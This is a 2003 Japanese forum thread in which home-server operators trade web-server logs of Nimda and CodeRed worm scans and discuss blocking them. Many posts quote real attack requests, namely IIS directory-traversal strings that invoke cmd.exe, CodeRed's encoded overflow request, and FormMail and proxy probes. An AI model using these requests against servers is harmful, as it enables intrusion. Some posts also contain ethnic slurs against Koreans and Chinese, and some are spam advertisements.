1read 100read
2013年05月自宅サーバ281: この鯖ワームにやられてます (336)
TOP カテ一覧 スレ一覧 2ch元 削除依頼 ▼
【セキュリティホール】情報交換【バグフィックス】 (305)
OpenNap/SlavaNap総合スレッド.003 (784)
ハッキングテストして欲しい奴鯖のIP晒せ (696)
Atomマザーで自宅サーバーはどうですか? (276)
自宅サーバシステム ほむぺ (222)
玄人志向「玄箱」で自宅サーバ Part14 (223)
この鯖ワームにやられてます
1 :03/02/08 〜 最終レス :2012/08/15 自宅で鯖も善いけど、管理はちゃんとしようよ。 ログを汚すだけではなく、ネットワーク資源のムダ使いの CodeRedやNimdaその他のワームにやられてる鯖を教え合おう!! 管理者がこの板みて、対処を期待する。
2 : 2 get!! おー鯖管理に関する話題だな。 でもな、ワームによってはIP詐称してるのもアルからな そういうのはどうする>>1 ?
3 : IP詐称されてるってのが分かるだけでも当人?としては いいかも。やっぱ気持ち悪いじゃん。 ところで3ズサ━━━━⊂(゚Д゚⊂⌒`つ≡≡≡━━━━!!
4 : ラストクリスマスキタ━━━━━━(゚∀゚)━━━━━━━!!!!!
5 : 218.86.248.174 [08/Feb/2003:08:26:23 +0900] - > GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0 218.114.46.157 [08/Feb/2003:10:57:07 +0900] - > GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0 知らんなら本人に気づいて欲しいという意味でも晒しとくよ
6 : 無駄。apache のlogに記録されない様にするのがいい。
7 : >>5 あんたYahooBBかい?
8 : >>4 それはワム
9 : >>7 あんた馬鹿の一つ覚えを繰り返してるゴミ送信主かい?
10 : >>6 どうやってやるんですか?
11 : >>9 うちもYahooBBで、YahooBBにしてから(IPアドレスが218.*.*.*になってから)Nimdaの攻撃が激増したから聞いているだけなんだけど・・・
12 : >>10 ここでも嫁 ttp://www.zdnet.co.jp/help/tips/linux/l0324.html
13 : >>4 >>8 ワラタ
14 : こういうのってプロバイダに通報した方がいいの?
15 : >>11 確かに、YahooBB(218.*.*.* と219.*.*.*がほとんど43.*.*.* 220.*.*.*は少ない) はNimdaの攻撃が多い。www.bbtec.netはApache使ってるし DNS(dns**.bbtec.net)はBIND8使ってるから、一般ユーザが感染していると考えられる。 常時接続で、知らぬ間にIIS探ししてるんだよね。1スキャンで16ヒットするから ログ解析ツールwebalizer,mrtgその他を使うとすぐ分る。 根本解決は管理者に教えてあげることだけど、めんどくさく、難しい事も多い。 逆引き出来れば良い方で、IP偽ってるのも結構ある。 対処方法は、>>6 が言っているようにログに残らないようにするのが簡単。
16 : 仮にも管理者が決まっている鯖なら、いくらぐーたらでも さすがにCodeRed/Nimda/Slammer級のワームについては対策されてると思いたいが。。。 今ごろになってもNimdaやらまきちらしてるのは 知らないうちにIISが動いてて持ち主も把握してないようなマシンだろう。 そういう「持ち主」はいても「管理者」はいないようなマシンは リプレースされるまでそのままだと思うよ。
17 : 久々にNIMDA来た 219.180.170.51 - - [09/Feb/2003:22:38:17 +0900] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 447
18 : 久々にCodeRed来た 80.204.44.179 - - [10/Feb/2003:00:34:17 +0900] "GET /default.ida?NNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090% u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u5 31b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 309 "-" "-"
19 : ぷららのDDNSだけどぷららも結構多いよ。 nslookupで引くとほとんどがぷららさん・・・
20 : >19 いまだにnslookup ( ´,_ゝ`)フ゜ッ
21 : ネームサーバをさせるわけでもないのに、 わざわざ dig や host のために bind for win をインストールしたり、 dnsip やら dnsipq やらのためにわざわざパッチ当てて djbdns をコンパイルするのはアレだし。 この程度のことならば nslookup でも特に問題にならんと思うんだけど、 他に Windows で使えるいいツール知らんかい? >>20
22 : 218.200.211.35 - - [10/Feb/2003:07:28:37 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 318 "-" "-" 218.200.211.35 - - [10/Feb/2003:07:28:41 +0900] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 316 "-" "-" 218.200.211.35 - - [10/Feb/2003:07:28:42 +0900] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 326 "-" "-" 218.200.211.35 - - [10/Feb/2003:07:28:42 +0900] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 326 "-" "-" 218.200.211.35 - - [10/Feb/2003:07:29:04 +0900] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 340 "-" "-" 218.200.211.35 - - [10/Feb/2003:07:29:05 +0900] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 357 "-" "-" 218.200.211.35 - - [10/Feb/2003:07:29:06 +0900] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 357 "-" "-" 218.200.211.35 - - [10/Feb/2003:07:29:07 +0900] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 373 "-" "-" 218.200.211.35 - - [10/Feb/2003:07:29:07 +0900] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 339 "-" "-" 218.200.211.35 - - [10/Feb/2003:07:29:08 +0900] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 339 "-" "-" 218.200.211.35 - - [10/Feb/2003:07:29:09 +0900] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 339 "-" "-" 218.200.211.35 - - [10/Feb/2003:07:29:10 +0900] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 339 "-" "-" 218.200.211.35 - - [10/Feb/2003:07:29:10 +0900] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 323 "-" "-" 218.200.211.35 - - [10/Feb/2003:07:29:11 +0900] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 323 "-" "-"
23 : 自動的にワームからのアクセスがあったときに root@アクセス元IPアドレス とかに警告メール出すようなソフトだれか作ってくり。
24 : >>23 http://reuven.lerner.co.il/projects/Apache-CodeRed-1.07.tar.gz
25 : >>24 make test PERL_DL_NONLAZY=1 /usr/bin/perl -Iblib/arch -Iblib/lib -I/usr/libdata/perl/5.00503/mach -I/usr/libdata/perl/5.00503 test .pl 1..1 Can't locate warnings.pm in @INC (@INC contains: blib/arch blib/lib /usr/libdata/perl/5.00503/mach /usr/libdata/perl/5.0 0503 /usr/libdata/perl/5.00503/mach /usr/libdata/perl/5.00503 /usr/local/lib/perl5/site_perl/5.005/i386-freebsd /usr/loc al/lib/perl5/site_perl/5.005 .) at blib/lib/Apache/CodeRed.pm line 4. BEGIN failed--compilation aborted at blib/lib/Apache/CodeRed.pm line 4. BEGIN failed--compilation aborted at test.pl line 10. *** Error code 2 Stop in /tmp/Apache-CodeRed-1.07
26 : http://bbs.1oku.com/bbs/bbs.phtml?id=rantyan ★ココだ★ココだ★
27 : >>23 警告メールは、やっぱり、 「回線切って、首つって、R」 みたいなの?
28 : >>19 それってぷららのDDNS使ってるからじゃない? Nimdaはご近所さん攻撃するものだし。
29 : 確かにNimdaは感染したマシンのセグメント付近に攻撃するよね。 所詮DDNSは、とりあえず立てましたって人が使うから管理甘いのよね。
30 : >>23 こんだけ騒がれてるのにいまだにワームをまきちらかしてるような奴が そんなの読むわけないと思われ。 だいたいWindowsが多いんだからrootに出してもまず無意味。 net send(smbclient -M)を送り返すとかしたほうがまだしも効果があるだろう。
31 : ピコ郎
32 : 久々だな。 62.217.134.16 - - [13/Feb/2003:19:21:53 +0900] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801% u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 226
33 : 最近codered多くない? しばらくこなかったけど 最近1日3回位くるYO ちなみに屋不ーBB
34 : [Thu Feb 13 18:32:04 2003] [error] [client 61.136.62.193] File does not exist: d:/network/server/apache/dcroot/scripts/..チ/winnt/system32/cmd.exe [Thu Feb 13 18:32:05 2003] [error] [client 61.136.62.193] File does not exist: d:/network/server/apache/dcroot/scripts/..タッ/winnt/system32/cmd.exe [Thu Feb 13 18:32:05 2003] [error] [client 61.136.62.193] File does not exist: d:/network/server/apache/dcroot/scripts/..チ/winnt/system32/cmd.exe [Thu Feb 13 18:32:07 2003] [error] [client 61.136.62.193] File does not exist: d:/network/server/apache/dcroot/scripts/..%5c/winnt/system32/cmd.exe [Thu Feb 13 18:32:07 2003] [error] [client 61.136.62.193] File does not exist: d:/network/server/apache/dcroot/scripts/..%2f/winnt/system32/cmd.exe 俺みたいにISDNで鯖をやってるようなヤシの所にも来るのか・・・
35 : >>33 うちもYahoo!BBだよ。 多すぎってほどじゃないけど、やっぱり日に2〜5件くらいはくるですねぇ。
36 : ……と、access_logをgrepして気が付きますた。 全然久々じゃないじゃないか (w
37 : お前らみたいな糞坊が鯖なんか立てるから、ウィルスが万円して逝くんだよ もっと勉強してから立てれ
38 : 漏れの所も… その1 [Fri Feb 14 21:44:55 2003] [error] [client 219.180.88.58] File does not exist: /var/www/html/scripts [Fri Feb 14 21:44:55 2003] [error] [client 219.180.88.58] File does not exist: /var/www/html/MSADC [Fri Feb 14 21:44:56 2003] [error] [client 219.180.88.58] File does not exist: /var/www/html/c [Fri Feb 14 21:44:56 2003] [error] [client 219.180.88.58] File does not exist: /var/www/html/d その2 [Sat Feb 15 01:25:25 2003] [error] [client 219.185.44.146] File does not exist: /var/www/html/scripts [Sat Feb 15 01:25:25 2003] [error] [client 219.185.44.146] File does not exist: /var/www/html/MSADC [Sat Feb 15 01:25:25 2003] [error] [client 219.185.44.146] File does not exist: /var/www/html/c [Sat Feb 15 01:25:25 2003] [error] [client 219.185.44.146] File does not exist: /var/www/html/d 両方ともにahoo!BB。 頼むよ。漏れもahoo!BBなんだけどさ(涙
39 : 一週間で1000リクエストほどワーム来るね
40 : うちもぷららのDDNS使ってますが、サーバ開通直後に わんさか来たので、ログの一部をサポートセンターに 送って対処をお願いしたら、それ以後は随分少なく なりましたよ。まあ、偶然かもしれませんが...
41 : やっぱり偶然でした(T_T) どうやら、土日はお休みで電源が落ちていただけの模様です。 ただのパソコンなんだろうな...
42 : 友人のケースでは、相手を特定して電話してやっと解決したってケースがありました。 相手は設計事務所のサーバーだったそうです。 それだから連絡先がわかった、と いうことでもありますが。 プロバイダーはシカトを決め込んでいたそうです。
43 : 少々のワームやウイルスはいちいちかまってられないが、 前OCNユーザーから1日200通のウイルスメールがきたときは さすがにたまりかねてOCNに連絡したよ… 鯖とは関係ない話だがな…
44 : 218.9.76.4 - - [07/Mar/2003:22:22:26 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 215 218.11.16.6 - - [06/Mar/2003:21:32:04 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 215 218.4.144.106 - - [06/Mar/2003:21:09:25 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 215 218.12.182.39 - - [06/Mar/2003:07:46:12 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 215 いい加減蝋人形にしちゃうよ?!
45 : 218.9.6.222 - - [08/Mar/2003:12:13:13 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 283 "-" "-" 218.18.18.72 - - [08/Mar/2003:15:38:43 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 283 "-" "-" 218.27.89.97 - - [08/Mar/2003:18:23:39 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 283 "-" "-" 218.6.243.62 - - [08/Mar/2003:19:01:17 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 283 "-" "-" 218.244.75.70 - - [08/Mar/2003:20:31:32 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 283 "-" "-" いい加減蝋人形にしちゃうよ?!
46 : 本日のニムダアクセス 韓国 61.250.216.1 中国 61.132.75.252
47 : #!/bin/sh if [ $1 ] && [ -f $1 ]; then ACCESS_LOG=$1 elif [ -f /usr/local/apache/logs/access_log ]; then ACCESS_LOG=/usr/local/apache/logs/access_log else echo "usage: $0 path_to_access_log" exit 1 fi egrep "cmd.exe|root.exe|NNNNNN" $ACCESS_LOG \ | awk '{ print $4,$5,$1; }' \ | sort -k 3,3 -u | sort -k 1,1 \ | sed -e 's/^/スキャン歓迎: /g' | more exit 0
48 : ワラタ
49 : "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 215 上のようなログがたくさんあるんですが、404じゃなくて302なのです・・・。 なんでかわかるかた教えてくださいm(__)m
50 : これはどうなのかな。。。 [Sun Mar 09 23:10:05 2003] [error] [client 218.78.252.218] File does not exist: c:/www/scripts/..チ/winnt/system32/cmd.exe [Sun Mar 09 23:10:07 2003] [error] [client 218.78.252.218] File does not exist: c:/www/scripts/..タッ/winnt/system32/cmd.exe [Sun Mar 09 23:10:09 2003] [error] [client 218.78.252.218] File does not exist: c:/www/scripts/..チ・winnt/system32/cmd.exe [Sun Mar 09 23:10:15 2003] [error] [client 218.78.252.218] File does not exist: c:/www/scripts/..%5c/winnt/system32/cmd.exe [Sun Mar 09 23:10:20 2003] [error] [client 218.78.252.218] File does not exist: c:/www/scripts/..%2f/winnt/system32/cmd.exe
51 : ∋8ノノハ.∩ 川o・-・)ノ <先生!こんなのがありました! __/ / / \(_ノ ̄ ̄ ̄\ ||ヽ|| ̄ ̄ ̄ ̄|| ...|| ̄ ̄ ̄ ̄|| http://saitama.gasuki.com/saitama/
52 : うちも、チョンとチャンコロばっかりです。 http://www.arearesearch.co.jp/ip-kensaku.html 今日は珍しく、アメリカのDSL回線とアラブ首長国連邦があった
53 : ま た 中 国 か
54 : default.ida?XXXXX...増殖中。 0件: 5/Mar 0件: 6/Mar 0件: 7/Mar 0件: 8/Mar 0件: 9/Mar 0件: 10/Mar 12件: 11/Mar 48件: 12/Mar
55 : 上にもあるが、最近こんなヤシが来るんですがこれもCODEREDだよね? 2003/03/13(13:14:12) W-SV 219.*.***.*** [80] 404 237 "GET / default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXY090V858\bd3W801Y090 V858\bd3W801Y090V858\bd3W801Y090Y090X190P0c3P003Xb00U31bU3ffP078 P000P0=a HTTP/1.0" 今まで見たNNNってヤシと違うもんだから気になって、、
56 : http://www.pink-angel.jp/betu/linkvp2/linkvp.html ★その目で確認すべし!!★超おすすめ★
57 : >>52 国際的ですね(w
58 : (^^)
59 : ほぼ毎日、韓国、中国。たまに日本。
60 : 韓国と中国がものすごく多い。 あと、日本国内だと普通の企業とか。
61 : ここ数日はCodeRed IIが多いですね、国内外を問わず。 荒らしてくれるのは、 愛知、神奈川、埼玉あたりが多いです。
62 : 我々に直接的な害はないんですがね。 見てて気持ち悪いですよ。
63 : こんなの出てた 61.191.128.106 - - [15/Mar/2003:20:26:20 +0900] "GET /default.ida?XXXX XXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 275 61.48.32.168 - - [15/Mar/2003:20:33:57 +0900] "GET /default.ida?XXXXXX XXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 275 61.83.171.22 - - [15/Mar/2003:22:54:03 +0900] "GET /default.ida?XXXXXX XXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 276
64 : CodeRedII多いなぁ 219.168.40.15 - - [15/Mar/2003:06:09:38 +0900] "GET /default.ida?XXXXXXXXXXXXXX 219.93.193.170 - - [15/Mar/2003:12:12:01 +0900] "GET /default.ida?XXXXXXXXXXXXX 219.94.102.51 - - [15/Mar/2003:16:44:21 +0900] "GET /default.ida?XXXXXXXXXXXXXX 219.145.159.175 - - [15/Mar/2003:17:57:31 +0900] "GET /default.ida?XXXXXXXXXXXX 219.138.9.227 - - [15/Mar/2003:19:18:09 +0900] "GET /default.ida?XXXXXXXXXXXXXX
65 : 218.64.67.194 - - [15/Mar/2003:18:26:32 +0900] "GET /default.ida?XXXXXXXXX 流行ってるね。
66 : 設置者は居ても、管理者が居ない鯖が多いということで
67 : ★あなたのお悩み解決致します!! ●浮気素行調査 彼氏、彼女、妻、夫の浮気を調査致します!! ●盗聴器R機発見 あなたの部屋に誰かが仕掛けているかも!! ●行方調査 行方不明になっている家族の消息を調査致します!! ●電話番号から住所割り出し 一般電話、携帯から住所を割り出し致します!! ●ストーカー対策 社会問題ともなっているストーカーを撃退致します!! その他人生相談からどんなお悩みでも解決いたします!! 直通 090−8505−3086 URL http://www.h5.dion.ne.jp/~grobal/ メール hentaimtt@k9.dion.ne.jp グローバル探偵事務局
68 : 003/03/16(20:32:54) W-SV 61.199.98.125 [80] 200 950 "GET /kiyaku.html HTTP/1.1" 2003/03/16(20:33:31) W-SV 61.251.250.14 [80] 404 242 "GET /scripts/root.exe?/c+dir HTTP/1.0" 2003/03/16(20:33:32) W-SV 61.251.250.14 [80] 404 240 "GET /MSADC/root.exe?/c+dir HTTP/1.0" 2003/03/16(20:33:32) W-SV 61.251.250.14 [80] 404 250 "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 2003/03/16(20:33:33) W-SV 61.251.250.14 [80] 404 250 "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 2003/03/16(20:33:36) W-SV 61.251.250.14 [80] E200035 " .. が含まれるリクエストは許可されていません。[ 61.251.250.14 "/scripts/..\../winnt/system32/cmd.exe" ]" 2003/03/16(20:33:36) W-SV 61.251.250.14 [80] 403 262 "GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 2003/03/16(20:33:37) W-SV 61.251.250.14 [80] E200035 " .. が含まれるリクエストは許可されていません。[ 61.251.250.14 "/_vti_bin/..\../..\../..\../winnt/system32/cmd.exe" ]" 2003/03/16(20:33:37) W-SV 61.251.250.14 [80] 403 275 "GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 2003/03/16(20:33:41) W-SV 61.251.250.14 [80] E200035 " .. が含まれるリクエストは許可されていません。[ 61.251.250.14 "/_mem_bin/..\../..\../..\../winnt/system32/cmd.exe" ]" 2003/03/16(20:33:41) W-SV 61.251.250.14 [80] 403 275 "GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 2003/03/16(20:33:44) W-SV 61.251.250.14 [80] E200035 " .. が含まれるリクエストは許可されていません。[ 61.251.250.14 "/msadc/..\../..\../..\/..チ../..チ../..チ../winnt/system32/cmd.exe" ]" 2003/03/16(20:33:44) W-SV 61.251.250.14 [80] 403 291 "GET /msadc/..%5c../..%5c../..%5c/..チ../..チ../..チ../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 2003/03/16(20:33:45) W-SV 61.251.250.14 [80] E200035 " .. が含まれるリクエストは許可されていません。[ 61.251.250.14 "/scripts/..チ../winnt/system32/cmd.exe" ]" 2003/03/16(20:33:45) W-SV 61.251.250.14 [80] 403 263 "GET /scripts/..チ../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
69 : >68 規約ってなんだっ
70 : CodeRedIIウザー(´Д`; 219.138.52.14 - - [19/Mar/2003:00:45:01 +0900] "GET /default.ida? 219.234.238.253 - - [18/Mar/2003:18:09:40 +0900] "GET /default.ida? 219.215.44.61 - - [18/Mar/2003:20:44:08 +0900] "GET /default.ida? 219.138.1.212 - - [19/Mar/2003:01:34:27 +0900] "GET /default.ida? 219.68.217.243 - - [19/Mar/2003:01:50:51 +0900] "GET /default.ida? 中国でもWindowsServer使ってるのか・・・ テストのため1日晒してただけで結構来るねぇ。
71 : 迷惑。マシンごと逝ってくれ、とくに220.13.136.85 YahooBB220013136085.bbtec.net - - [18/Mar/2003:04:00:21 +0900] "GET /default.ida?XXXXXXXXX YahooBB220013232179.bbtec.net - - [18/Mar/2003:07:09:43 +0900] "GET /default.ida?XXXXXXXXX YahooBB220027008006.bbtec.net - - [19/Mar/2003:09:17:43 +0900] "GET /default.ida?XXXXXXXXX
72 : >>71 うちも220.*.*.*からばかり来てるな。 まだそれほど多いと感じて無いけど。
73 : 61.236.229.237からCodeRedが北んで、何かと思ってアクセスしたら、 www.okxa.comというドメインのサイトですた。 何、ココ?エロゲサイト?
74 : うちは、1日に、CodeRedが34回、Nimdaが32回なんてのも、 普通だす。 なんとかしたいのでつが・・・ サーバーは、BIGLOBEです。。
75 : >>73 下にメアド書いてあるじゃん。とりあえず英語と中国語?で文句言ってみれば?
76 : まぁ、MicroSoftのWebサイトにCodeRed.F対策のアナウンスが挙がってるんだから 身に覚えのある人はパッチをあてて欲しいですね
77 : 最近やたらCodeRedII多くないかい? 218.***.***.***から目茶苦茶(100/day程度)来るんだけど あーうぜー
78 : 初めて見た。 210.220.73.20 - - [02/Apr/2003:06:56:31 +0900] "GET / HTTP/1.1" 200 765 "-" "-" 210.220.73.20 - - [02/Apr/2003:06:56:32 +0900] "GET /NULL.printer HTTP/1.1" 404 1059 "-" "-" 210.220.73.20 - - [02/Apr/2003:06:56:32 +0900] "GET /NULL.IDA?CCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC%u0aeb%ub890%udacf%u77ee%u 0000%u0000%u838b%u0094%u0000%u408・・・以降文字化けで表示できない
79 : SYN Flood Attackしてくる香具師もなんとかしる
80 : >78 ウチにも来たよ 211.189.57.126から 最初はイタズラされてるだけあかと持ったんだけど、新しいワームかね? 相手はコーリャンのIISでした。
81 : 211.158.61.191 - - [06/Apr/2003:05:12:15 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 215 211.158.61.191 - - [06/Apr/2003:05:12:20 +0900] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 215 211.158.61.191 - - [06/Apr/2003:05:12:25 +0900] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 215 211.158.61.191 - - [06/Apr/2003:05:12:31 +0900] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 215 211.158.61.191 - - [06/Apr/2003:05:12:36 +0900] "GET /scripts/..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 215 211.158.61.191 - - [06/Apr/2003:05:12:41 +0900] "GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 215 211.158.61.191 - - [06/Apr/2003:05:12:47 +0900] "GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 215 211.158.61.191 - - [06/Apr/2003:05:12:52 +0900] "GET /msadc/..%5c../..%5c../..%5c/..チ../..チ../..チ../winnt/system32/cmd.exe HTTP/1.0" 404 215 211.158.61.191 - - [06/Apr/2003:05:12:57 +0900] "GET /scripts/..チ../winnt/system32/cmd.exe HTTP/1.0" 404 215 211.158.61.191 - - [06/Apr/2003:05:13:02 +0900] "GET /scripts/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 215 211.158.61.191 - - [06/Apr/2003:05:13:08 +0900] "GET /../winnt/system32/cmd.exe HTTP/1.0" 403 194 211.158.61.191 - - [06/Apr/2003:05:13:13 +0900] "GET /../winnt/system32/cmd.exe HTTP/1.0" 403 194 211.158.61.191 - - [06/Apr/2003:05:13:18 +0900] "GET /scripts/..l5c../winnt/system32/cmd.exe HTTP/1.0" 404 215 211.158.61.191 - - [06/Apr/2003:05:13:24 +0900] "GET /scripts/..l5c../winnt/system32/cmd.exe HTTP/1.0" 404 215 211.158.61.191 - - [06/Apr/2003:05:13:29 +0900] "GET /scripts/..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 215 211.158.61.191 - - [06/Apr/2003:05:13:34 +0900] "GET /scripts/..%2f../winnt/system32/cmd.exe HTTP/1.0" 404 215 ウザい。
82 : 中国、韓国からのアクセスは禁止!!
83 : どかーん! (⌒⌒⌒) || / ̄ ̄ ̄ ̄ ̄\ | ・ U | | |ι |つ U||  ̄ ̄ ||  ̄  ̄ もうおこったぞう 61.232.0.1-61.237.255.254<!-- (CN)CHINA RAILWAY TELECOMMUNICATIONS CENTER --> 218.13.0.1-218.18.255.254<!-- (CN) CHINANET Guangdong province network Data Communication Division China Telecom --> 218.144.0.1-218.159.255.254<!-- (KR)KOREA TELECOM Network Management Center --> 220.64.0.1-220.71.255.254<!-- (KR)KRNIC Korea Network Information Center --> 220.72.0.1-220.87.255.254<!-- (KR)KOREA TELECOM Network Management Center --> 220.112.0.1-220.115.255.254<!-- (CN)Greatwall Broadband Network Co.Ltd. --> 220.163.0.1-220.165.255.254<!-- (CN)CHINANET yunnan province network China Telecom --> アク禁
84 : >80 >最初はイタズラされてるだけあかと持ったんだけど、 いたずらしないで頂きたい。 ログ汚れ過ぎ IIS狙われすぎ ついでにsage過ぎ あれ以来きてない。 >83 正解かも
85 : どうもアタックの内容がアレなせいで落ちてるっぽいのよね IPアドレスじゃなくてドメインで狙われてるっぽいし・・・
86 : これは? 09.191.15.2 - - [09/Apr/2003:08:04:57 +0900] "GET /cgi-bin/formmail.pl HTTP/1.0" 404 1184 209.191.15.2 - - [09/Apr/2003:08:05:01 +0900] "GET /cgi-bin/formmail.cgi HTTP/1.0" 404 1184 209.191.15.2 - - [09/Apr/2003:08:05:03 +0900] "GET /cgi-bin/FormMail.pl HTTP/1.0" 404 1184 209.191.15.2 - - [09/Apr/2003:08:05:05 +0900] "GET /cgi-bin/FormMail.cgi HTTP/1.0" 404 1184 209.191.15.2 - - [09/Apr/2003:08:05:09 +0900] "GET /cgi-sys/formmail.pl HTTP/1.0" 404 1184 209.191.15.2 - - [09/Apr/2003:08:05:10 +0900] "GET /cgi-sys/formmail.cgi HTTP/1.0" 404 1184 wsip68-15-27-215.sd.sd.cox.net - - [09/Apr/2003:08:05:21 +0900] "GET /cgi-sys/formmail.cgi HTTP/1.0" 404 1184 wsip68-15-27-215.sd.sd.cox.net - - [09/Apr/2003:08:05:22 +0900] "GET /cgi-sys/FormMail.pl HTTP/1.0" 404 1184 wsip68-15-27-215.sd.sd.cox.net - - [09/Apr/2003:08:05:22 +0900] "GET /cgi-bin/Formmail.pl HTTP/1.0" 404 1184 wsip68-15-27-215.sd.sd.cox.net - - [09/Apr/2003:08:05:24 +0900] "GET /cgi-bin/mail.pl HTTP/1.0" 404 1184 wsip68-15-27-215.sd.sd.cox.net - - [09/Apr/2003:08:05:25 +0900] "GET /cgi-bin/FORMMAIL.PL HTTP/1.0" 404 1184
87 : 板違いだけどついでにこれも 0-2pool57-34.nas10.lansing2.mi.us.da.qwest.net - - [08/Apr/2003:13:58:44 +0900] "CONNECT mailin-04.mx.aol.com:25 HTTP/1.0" 405 992 "-" "-" 多分オープンプロキシの検索ロボットだけど、踏み台に利用されないように。
88 : >>86 は任意の宛先に送信できるメール送信 CGI を狙った spammer。 >>87 は外部から任意のポートに接続できるプロクシを狙った spammer。
89 : 最近、CONNECT〜が増えてきましたね
90 : あの手、この手ですよね。 まえにスパムを配信するウイルスの実験が行われていた可能性があると 記事で読んだ記憶があるけど。 スパムとワーム。何かオーバラップらして見えてくるのは自分だけかな。
